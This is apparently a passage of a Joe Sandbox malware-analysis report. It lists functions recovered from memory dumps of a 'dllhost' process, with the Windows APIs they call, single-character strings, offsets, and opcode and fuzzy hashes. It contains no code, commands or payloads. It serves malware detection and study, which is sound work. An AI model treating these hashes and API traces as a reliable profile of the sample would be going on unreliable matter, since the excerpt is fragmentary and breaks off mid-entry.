Instruction Fuzzy Hash: 8001F4756042409FFB108F19D986761FBE4EF04321F08C0AADD458B752D379E804DEA3

Function 0073AD72 Relevance: 1.5, APIs: 1, Instructions: 38COMMON

Download Yara Rule

APIs

GetLogicalDrives.KERNELBASE ref: 0073ADA1

Memory Dump Source

Source File: 00000025.00000002.1979212671.000000000073A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0073A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_73a000_dllhost.jbxd

Similarity

API ID: DrivesLogical
String ID:
API String ID: 999431828-0
Opcode ID: a7f1f847b65889c086069437eceb4b6d0592a86c6b2c42c1ee52beb5b045c079
Instruction ID: eb86944721a0041826a700270b0ec1d6d84eac07adfd81863b2efebbca11f95c
Opcode Fuzzy Hash: a7f1f847b65889c086069437eceb4b6d0592a86c6b2c42c1ee52beb5b045c079
Instruction Fuzzy Hash: BB01D1755042409FEB10CF15D9867A6FBE4EF40321F08C4AADD898F656D379A804CAA2

Function 0073A676 Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(?), ref: 0073A6A8

Memory Dump Source

Source File: 00000025.00000002.1979212671.000000000073A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0073A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_73a000_dllhost.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: ec8a35d9cff9794289121559f63175f570e2f98bd2d4f03b3f687557213ad821
Instruction ID: e132f890151b7cfb38967f10077e022b816808ac9daa93d74a4ee0c563c61398
Opcode Fuzzy Hash: ec8a35d9cff9794289121559f63175f570e2f98bd2d4f03b3f687557213ad821
Instruction Fuzzy Hash: A7F0AF75404240DFEB108F16D986761FBE4EF04324F0CC49ADD8A4B362D37AA814CEA3

Function 049107C7 Relevance: 1.5, Strings: 1, Instructions: 202COMMON

Download Yara Rule

Strings

2, xrefs: 049107FD

Memory Dump Source

Source File: 00000025.00000002.1991244078.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_4910000_dllhost.jbxd

Similarity

API ID:
String ID: 2
API String ID: 0-450215437
Opcode ID: 67d25f73cc2c78cd3c428b1953f6de3e39aa61a3c8388d255183990c5b78895e
Instruction ID: e6d17763a7ef2d37b79da4a4e96ee017443d1cf1eb5f82531ff31810a4878085
Opcode Fuzzy Hash: 67d25f73cc2c78cd3c428b1953f6de3e39aa61a3c8388d255183990c5b78895e
Instruction Fuzzy Hash: 5051B7F29892E24FDB058B2998CA4C8BF71DE5122C725C5EDC0508F55FE22E560BDF85

Function 0073B3FC Relevance: 1.3, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 0073B468

Memory Dump Source

Source File: 00000025.00000002.1979212671.000000000073A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0073A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_73a000_dllhost.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 1af176321a2f026ffbc087e91e539830dee210a30211fe250dceaabf9a6483be
Instruction ID: def6bf0c243d223cbee574d9ee52a4644bf2ee7d02135a620216e60845e3fd30
Opcode Fuzzy Hash: 1af176321a2f026ffbc087e91e539830dee210a30211fe250dceaabf9a6483be
Instruction Fuzzy Hash: 7921A1B25093C05FEB028B25DC54792BFB4EF47324F0984DAED858F263D265A908CB62

Function 0073A3C0 Relevance: 1.3, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 0073A414

Memory Dump Source

Source File: 00000025.00000002.1979212671.000000000073A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0073A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_73a000_dllhost.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 5d58ed7c36b64416d9098d5de7e3f0c25bfb57337c82965feca19375ae06af93
Instruction ID: 4842fea604e4d32a2e91e85f313f71797f4ae1d27398b99d161e2cbe56aa2756
Opcode Fuzzy Hash: 5d58ed7c36b64416d9098d5de7e3f0c25bfb57337c82965feca19375ae06af93
Instruction Fuzzy Hash: FA1177715093C09FDB128F25DC95752BFB8DF46220F0884DBED858F653D275A818CB62

Function 0073A3E2 Relevance: 1.3, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 0073A414

Memory Dump Source

Source File: 00000025.00000002.1979212671.000000000073A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0073A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_73a000_dllhost.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 292b7455af8989375a71c3b5fd811554050b1895c39e2d88f8cf1114a7053aab
Instruction ID: 7fb644ab64def8fbf9c4978f7bd2dc1afd24388786b3d59ef462716cd1c45a54
Opcode Fuzzy Hash: 292b7455af8989375a71c3b5fd811554050b1895c39e2d88f8cf1114a7053aab
Instruction Fuzzy Hash: 3601A7755042809FEB10CF19D98A766FBD4DF44324F08C4ABDD498F652D379E814CAA3

Function 0073B436 Relevance: 1.3, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 0073B468

Memory Dump Source

Source File: 00000025.00000002.1979212671.000000000073A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0073A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_73a000_dllhost.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: d29c3a6fd0c33b73efe1c802122f75203cf4da50a9924ae522cdeda1c05de6c8
Instruction ID: a6aa281d96f98ad6a1ecabf7b210683816889f71225e59064a7f9a5993c04791
Opcode Fuzzy Hash: d29c3a6fd0c33b73efe1c802122f75203cf4da50a9924ae522cdeda1c05de6c8
Instruction Fuzzy Hash: A60184759042808FEB10CF15E985756FBE4DF44720F08C4AADE498F653D379E814CBA2

Function 048410DE Relevance: 1.3, Strings: 1, Instructions: 36COMMON

Download Yara Rule

Strings

|, xrefs: 0484392A

Memory Dump Source

Source File: 00000025.00000002.1991197780.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID: |
API String ID: 0-2343686810
Opcode ID: 337d20b30aa1216fca0f3fa0e097cfb62da5c4b819d400a15fea6345909cc78d
Instruction ID: 43b906bb97c9bcad86cd80eeacb73c01aa2b9f97265bf033f1eac5cfb4743a4a
Opcode Fuzzy Hash: 337d20b30aa1216fca0f3fa0e097cfb62da5c4b819d400a15fea6345909cc78d
Instruction Fuzzy Hash: 91F0CD75B0C25CCBE7104F54881436D7760AB86394F0946E6DC09D7282D7799D05CB96

Function 04910295 Relevance: 1.3, Strings: 1, Instructions: 17COMMON

Download Yara Rule

Strings

M, xrefs: 049102C3

Memory Dump Source

Source File: 00000025.00000002.1991244078.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_4910000_dllhost.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: a4abb90e9542eb9aebc03ff960e0b4150683de7be7832c7bdab887f99b07b4e0
Instruction ID: 36dc02a5bda0cd21453034da9bee9562cb7cd91abb0bbe7b8d9aef72a3279359
Opcode Fuzzy Hash: a4abb90e9542eb9aebc03ff960e0b4150683de7be7832c7bdab887f99b07b4e0
Instruction Fuzzy Hash: B6E04F70E0524CDBEB04DFE9C50429D77B2AF46304F50C835C106D6654EBBD59848B02

Function 0491010A Relevance: 1.3, Strings: 1, Instructions: 17COMMON

Download Yara Rule

Strings

K, xrefs: 04910136

Memory Dump Source

Source File: 00000025.00000002.1991244078.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_4910000_dllhost.jbxd

Similarity

API ID:
String ID: K
API String ID: 0-856455061
Opcode ID: 3f3d6255420ae3c6fabbf3ed825f976dde0c867da95c8dcfdb775bff832f28ec
Instruction ID: e9ad5cc0b8b1cc79637d3abc107d88318b0559c90bad951281047b2908feed1a
Opcode Fuzzy Hash: 3f3d6255420ae3c6fabbf3ed825f976dde0c867da95c8dcfdb775bff832f28ec
Instruction Fuzzy Hash: 42E08634E0524DCFEB44DFB4D50429D77B2AF42344F50C835D506D6614EB7D99448A06

Function 04840372 Relevance: 1.3, Strings: 1, Instructions: 17COMMON

Download Yara Rule

Strings

9, xrefs: 048456AC

Memory Dump Source

Source File: 00000025.00000002.1991197780.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID: 9
API String ID: 0-2366072709
Opcode ID: 116a52d8840a5f0cc1d4003ad958024ddf5b0b2234a2f6e9914c2fee3b0c5c43
Instruction ID: 3cff271f98e1727d7e1d88f4c7006842471d196dae63719c6a76718a82938dfd
Opcode Fuzzy Hash: 116a52d8840a5f0cc1d4003ad958024ddf5b0b2234a2f6e9914c2fee3b0c5c43
Instruction Fuzzy Hash: 54E026B56081A8CFF7405F18841534C3790AB44394F0449D6E901C7242E6791E018F46

Function 049109AE Relevance: 1.3, Strings: 1, Instructions: 16COMMON

Download Yara Rule

Strings

V, xrefs: 049109C6

Memory Dump Source

Source File: 00000025.00000002.1991244078.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_4910000_dllhost.jbxd

Similarity

API ID:
String ID: V
API String ID: 0-1342839628
Opcode ID: 99c6601cf54a23d984dd814aa34c96745adbc191b7c8cef0f80e8bf1da4ce9a5
Instruction ID: 41bfc391813246fcfe85df10b4086423c268bc545222cb72c0aa3f8e4e5f93f8
Opcode Fuzzy Hash: 99c6601cf54a23d984dd814aa34c96745adbc191b7c8cef0f80e8bf1da4ce9a5
Instruction Fuzzy Hash: B0E08638A0124DCFEF409FE4D51439E37B1EF42304F508825D502D6750DB7D5A848B07

Function 04910639 Relevance: 1.3, Strings: 1, Instructions: 14COMMON

Download Yara Rule

Strings

/, xrefs: 0491065E

Memory Dump Source

Source File: 00000025.00000002.1991244078.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_4910000_dllhost.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: ae2c3ed3eb9dd5d1f86aea3e6a70ff267e0e5255ccd54f3fb549a3a15bae778b
Instruction ID: cf41d77b6e0c9aeb4265af540380889c15db75f6e1bd31d83caa7521b84e217c
Opcode Fuzzy Hash: ae2c3ed3eb9dd5d1f86aea3e6a70ff267e0e5255ccd54f3fb549a3a15bae778b
Instruction Fuzzy Hash: D2D05E2490B28A4FDB019B6484192987FF09F07210F5085A28092DB2A2EA3C581D9701

Function 0491037E Relevance: 1.3, Strings: 1, Instructions: 14COMMON

Download Yara Rule

Strings

d, xrefs: 049103A3

Memory Dump Source

Source File: 00000025.00000002.1991244078.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_4910000_dllhost.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 3ba741bd3ed33a91d09716f25e783dde9b62d2460efc18a8bc50a1a0a031e529
Instruction ID: 8727390d25188aec2dde8bedf6f4668203be4e580cc1946789266d241ad45a7e
Opcode Fuzzy Hash: 3ba741bd3ed33a91d09716f25e783dde9b62d2460efc18a8bc50a1a0a031e529
Instruction Fuzzy Hash: E3D0A734E013898BD7415F64892538C3BE19F02240F84C566C086DB351DE7D08494742

Function 04910222 Relevance: 1.3, Strings: 1, Instructions: 11COMMON

Download Yara Rule

Strings

(, xrefs: 04910237

Memory Dump Source

Source File: 00000025.00000002.1991244078.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_4910000_dllhost.jbxd

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: 8a82f0c8c362aefc2ae11cafea7075243abc0814cecb2f95498daf4856a70193
Instruction ID: e9e4d2b909b46659602b320d5a7dafadd025f90b5d0319eb835967fddf691ad4
Opcode Fuzzy Hash: 8a82f0c8c362aefc2ae11cafea7075243abc0814cecb2f95498daf4856a70193
Instruction Fuzzy Hash: 9CD09E34A0624CCBDF449F94D15469D77A2AB46300F508835D002D6655DA7D5D849B01

Function 04910415 Relevance: 1.3, Strings: 1, Instructions: 7COMMON

Download Yara Rule

Strings

\, xrefs: 0491042A

Memory Dump Source

Source File: 00000025.00000002.1991244078.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_4910000_dllhost.jbxd

Similarity

API ID:
String ID: \
API String ID: 0-2967466578
Opcode ID: f0a1d266bd0fd6f1fc88b4dc92bb5001610e1a0ff708db8d6a3343ce7bc9b209
Instruction ID: e690d1353a9b8b89ef1ddb54a6322c801715261f8b8744bcc590331eac66b167
Opcode Fuzzy Hash: f0a1d266bd0fd6f1fc88b4dc92bb5001610e1a0ff708db8d6a3343ce7bc9b209
Instruction Fuzzy Hash: 3EC04C74E01248CBEB549FF4C52879C76A19B56345F50C4298512A7395EA7D14044F02

Function 049108DC Relevance: 1.3, Strings: 1, Instructions: 7COMMON

Download Yara Rule

Strings

L, xrefs: 049108F4

Memory Dump Source

Source File: 00000025.00000002.1991244078.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_4910000_dllhost.jbxd

Similarity

API ID:
String ID: L
API String ID: 0-2909332022
Opcode ID: 918150a4ae599f938bd7daacb99381b751e1c5df95df76cb803b090d2fb9f331
Instruction ID: 09a24500bbbe3e5493af509f65ff713398e813177a300f27beeb5d93dc88bc35
Opcode Fuzzy Hash: 918150a4ae599f938bd7daacb99381b751e1c5df95df76cb803b090d2fb9f331
Instruction Fuzzy Hash: 0CC04C74A021488BEB84AFB4C51879C76A69B56344F508469850AA6395EA7D1A448B06

Function 04910500 Relevance: 1.3, Strings: 1, Instructions: 7COMMON

Download Yara Rule

Strings

;, xrefs: 04910515

Memory Dump Source

Source File: 00000025.00000002.1991244078.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_4910000_dllhost.jbxd

Similarity

API ID:
String ID: ;
API String ID: 0-1661535913
Opcode ID: d1c8ad07814c818db4c847b71325c4c55ba23848357fe0dbccf43a6431e319ff
Instruction ID: 244f16c4a7843b2e18b6324e82f347ea8c1dde54a9bea6ad50dcdbedd3e1dca6
Opcode Fuzzy Hash: d1c8ad07814c818db4c847b71325c4c55ba23848357fe0dbccf43a6431e319ff
Instruction Fuzzy Hash: 06C04C74E021488BDB449FF4C11839D76A69B56784F5085395502A7395EB7E1A04CB02

Function 04910340 Relevance: 1.3, Strings: 1, Instructions: 7COMMON

Download Yara Rule

Strings

6, xrefs: 04910358

Memory Dump Source

Source File: 00000025.00000002.1991244078.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_4910000_dllhost.jbxd

Similarity

API ID:
String ID: 6
API String ID: 0-498629140
Opcode ID: 2f23aa233026d01c886816cc4698771491ed791c357ca978cf91ffe82b0b0d85
Instruction ID: 7c897e951de44dc0864ef1f1e33d6fe62319c554866ab7ce13d65bed4cd9efae
Opcode Fuzzy Hash: 2f23aa233026d01c886816cc4698771491ed791c357ca978cf91ffe82b0b0d85
Instruction Fuzzy Hash: B5C04C74A021488BDB949FF4C51939C76E59B57345F50C469800AA6395EE7D19448B42

Function 049104C9 Relevance: 1.3, Strings: 1, Instructions: 7COMMON

Download Yara Rule

Strings

[, xrefs: 049104DE

Memory Dump Source

Source File: 00000025.00000002.1991244078.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_4910000_dllhost.jbxd

Similarity

API ID:
String ID: [
API String ID: 0-784033777
Opcode ID: 0a7f96a43de99fc6943a69751c3c5823bd6477ce7aece069e541b1806239b087
Instruction ID: 97bdc2a17b63a120f9ad7a2abc5f01bc1506e39262db46ccc8c33ffccdf68c55
Opcode Fuzzy Hash: 0a7f96a43de99fc6943a69751c3c5823bd6477ce7aece069e541b1806239b087
Instruction Fuzzy Hash: BBC04C74E012488BEB449FE4C51879D76A59B56385F40C4299506EB394EB7D1504CF02

Function 04910436 Relevance: 1.3, Strings: 1, Instructions: 7COMMON

Download Yara Rule

Strings

), xrefs: 0491044E

Memory Dump Source

Source File: 00000025.00000002.1991244078.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_4910000_dllhost.jbxd

Similarity

API ID:
String ID: )
API String ID: 0-2427484129
Opcode ID: df54b55c5938ee55f01de523c0af8993279f845acac7147a3c2c16f17f91c673
Instruction ID: 649ec761c49a8a644f280eb8360f3b2078c538d74d0f7f599a870455a14efda2
Opcode Fuzzy Hash: df54b55c5938ee55f01de523c0af8993279f845acac7147a3c2c16f17f91c673
Instruction Fuzzy Hash: 58C04C74F0124C8BEB449FB4C52879C76E69B56345F4085698006AA395EA7D19444F12

Function 049108B8 Relevance: 1.3, Strings: 1, Instructions: 7COMMON

Download Yara Rule

Strings

E, xrefs: 049108D0

Memory Dump Source

Source File: 00000025.00000002.1991244078.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_4910000_dllhost.jbxd

Similarity

API ID:
String ID: E
API String ID: 0-3568589458
Opcode ID: 8fafb59a299feff0f57f23863d05e016d0ccf00d021102b3f2b93e53dcdaac3f
Instruction ID: d8f2d3d55a993e8f00940a56b03e7435817e8241d8e715e5f946f22ccf33c983
Opcode Fuzzy Hash: 8fafb59a299feff0f57f23863d05e016d0ccf00d021102b3f2b93e53dcdaac3f
Instruction Fuzzy Hash: F7C08C70A011088BEB809FA4C81879C36B2AB42300F40C4294006E7380EE7C09408F12

Function 049103AF Relevance: 1.3, Strings: 1, Instructions: 7COMMON

Download Yara Rule

Strings

h, xrefs: 049103C4

Memory Dump Source

Source File: 00000025.00000002.1991244078.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_4910000_dllhost.jbxd

Similarity

API ID:
String ID: h
API String ID: 0-2439710439
Opcode ID: 3e7c1d9efba88584ebdbd05dfc85fcd3df6cd139764d5f8339704c9c1834a43c
Instruction ID: 1fd58c9b087c647384ebe0c33e9fd1d181678484256a846604cfdefda0aa100c
Opcode Fuzzy Hash: 3e7c1d9efba88584ebdbd05dfc85fcd3df6cd139764d5f8339704c9c1834a43c
Instruction Fuzzy Hash: 93C04C74B0124C8BDF849FF4C5183AC76A6AF56345F50863D4002A7395EF7D18449B02

Function 0484F298 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000025.00000002.1991197780.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d495c5ad83c4304ba26948d744398587b69bdc0bf3228f45788ed0bf97c66cbf
Instruction ID: c465f6dd5a6481ff51c7dc078c1348015e29fa60b11fa72e335713819e7be32e
Opcode Fuzzy Hash: d495c5ad83c4304ba26948d744398587b69bdc0bf3228f45788ed0bf97c66cbf
Instruction Fuzzy Hash: 6C213C78A0424DCBEB50EFA8E50826DB7F1BF81308F008569D701D7251EB78AA14DB56

Function 007205DF Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000025.00000002.1979018397.0000000000720000.00000040.00000020.00020000.00000000.sdmp, Offset: 00720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_720000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 189e37059eae6a0b76534ec8bad927fd91118b76a3746e2c7528cc7b74886185
Instruction ID: 1500ba74540b957ace3c69fd36add010c5b84419ed1f986d2be615b4eee40699
Opcode Fuzzy Hash: 189e37059eae6a0b76534ec8bad927fd91118b76a3746e2c7528cc7b74886185
Instruction Fuzzy Hash: B6018B7550D7806FD7118B159C41863FFF8DF86670749C49FEC498B653D225A809CB72

Function 04840007 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000025.00000002.1991197780.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d343bd93a0ed69c883fbc0d1869045585c7b07478669eeb50e6bc07381028d3
Instruction ID: 157cb24c8fb77c4e901bf15c428b53c964ec5d374d97b3e7ec59024c6d98d592
Opcode Fuzzy Hash: 1d343bd93a0ed69c883fbc0d1869045585c7b07478669eeb50e6bc07381028d3
Instruction Fuzzy Hash: D001616004F7C68FC70397B86861A867FB86E83148B5E49EBC4C0CF0A3D208995ED722

Function 0484206F Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000025.00000002.1991197780.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c9955f776a0d33c1a1c2d50c386f8a538abd8f8b54dac8da41ca497beb649d6
Instruction ID: 454e6aacbefd9a0efb1ccd32d8f6c36f6c56206d3690771956d74319390f0c1b
Opcode Fuzzy Hash: 9c9955f776a0d33c1a1c2d50c386f8a538abd8f8b54dac8da41ca497beb649d6
Instruction Fuzzy Hash: CFF03C79A09219CBDB549F24D89876CB3A1BBC5301F10C9A6E94A93350DF796E84CF41

Function 04841704 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000025.00000002.1991197780.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82442852af1caf945cfc5a388ad9f11fabcca61987dac88887f7116a7de85915
Instruction ID: 1587472071c888196e66419d683809a555c3bcae52d03cb3438370435ee0fa06
Opcode Fuzzy Hash: 82442852af1caf945cfc5a388ad9f11fabcca61987dac88887f7116a7de85915
Instruction Fuzzy Hash: C1F0F9B8A05119DBDB548F24DD587ACB7B1ABC9344F04C8A6E90AE2290DF78AE44CF44

Function 00720606 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000025.00000002.1979018397.0000000000720000.00000040.00000020.00020000.00000000.sdmp, Offset: 00720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_720000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a2c813e718642d26a3573e45da905b03a2fbdb279bef24c6ff276f7dea86a21
Instruction ID: e4e3755347b79ec105fe7a0b8f260d993f26f59ee38db3a45335ebd651e01661
Opcode Fuzzy Hash: 8a2c813e718642d26a3573e45da905b03a2fbdb279bef24c6ff276f7dea86a21
Instruction Fuzzy Hash: 2AE092B66046004B9650CF0BFC81462F7D8EB88670708C07FDC0D8B711D676B904CAA5

Function 048415D9 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000025.00000002.1991197780.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69fc232886b72ac6494227f6d478f7391659af37ac41b84c7e31ca77ea23181b
Instruction ID: 6f51723c345746034af813326cea2320cde3b83d0eae018a91eb83dd8dbc55d4
Opcode Fuzzy Hash: 69fc232886b72ac6494227f6d478f7391659af37ac41b84c7e31ca77ea23181b
Instruction Fuzzy Hash: A2017EB4E0022DDFCB60CF14CD84BD9B7B1BB8A204F0081EA964DA2211EB316E84DF59

Function 04846D48 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000025.00000002.1991197780.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e6e99ebd00e652d25eab2af2d4f407d127da96535282757d72a7b0e2684a2cf
Instruction ID: 2866e72344b55f19f6155da4d87493763ba15da8251b0172b19ac068b4a66005
Opcode Fuzzy Hash: 9e6e99ebd00e652d25eab2af2d4f407d127da96535282757d72a7b0e2684a2cf
Instruction Fuzzy Hash: 3BF0E538B00208DBDB24AB70A80D3697799FB86704F008569DA06C3382EFBE6E489715

Function 04843A05 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000025.00000002.1991197780.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 495ffa848645e16f34088901e5f15aff8b2db24c72312f4ded50299ee93af4ca
Instruction ID: cf330fe286b375ad7ec720d5415dc4c1666913ac799aa1d7a7f7e6af6c189ffa
Opcode Fuzzy Hash: 495ffa848645e16f34088901e5f15aff8b2db24c72312f4ded50299ee93af4ca
Instruction Fuzzy Hash: 17E0C23970816CCFE7405F1CC50535C36E0AB8A394F088AE6FE06DB382D7399D418B96

Function 04842E1A Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000025.00000002.1991197780.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0361c85c799cb985f4468164ce7a453e57910326f68e10159cd9a0b87c451c55
Instruction ID: 5e1de2558ab8f7124012006d8e2f905610a005619773a7e6beb421d44e880930
Opcode Fuzzy Hash: 0361c85c799cb985f4468164ce7a453e57910326f68e10159cd9a0b87c451c55
Instruction Fuzzy Hash: EBE08679B08215DFEB405F60D81876DB3A4AB85350F0488B6B94DC3240EB3C5E40CF66

Function 007323F4 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000025.00000002.1979114828.0000000000732000.00000040.00000800.00020000.00000000.sdmp, Offset: 00732000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_732000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6809cbc5e03a888f3cde4febd3ed31888a2def6af74b5ab119551a416d8213ea
Instruction ID: 64c2b3d1f144d35205f32e198f3d1be4d9eecb9f51500648e128c3e40567ce3d
Opcode Fuzzy Hash: 6809cbc5e03a888f3cde4febd3ed31888a2def6af74b5ab119551a416d8213ea
Instruction Fuzzy Hash: 5BD05E793096C18FF7169A1CC1A4B9537D4AB51714F5A44F9A8408B763C76CEDC2D600

Function 007323BC Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000025.00000002.1979114828.0000000000732000.00000040.00000800.00020000.00000000.sdmp, Offset: 00732000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_732000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cf26a7b3d4f04d328d087fe9620f47eb5aae40638a62ce930919b44f79fc04d
Instruction ID: 9b1f1a3d069d58b732315f407d24531fcb44005e646cae026003ac151aa1efa7
Opcode Fuzzy Hash: 5cf26a7b3d4f04d328d087fe9620f47eb5aae40638a62ce930919b44f79fc04d
Instruction Fuzzy Hash: 98D05E356452814BEB15DA0CC2D4F5973D4AB44B14F0644E8AC108B263C7ACD8C1CA00

Function 0484110B Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000025.00000002.1991197780.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92059ac2f5a226f7da6e6c737f8b79e1906f8e21ffbb5d71bfd25de95404f0bf
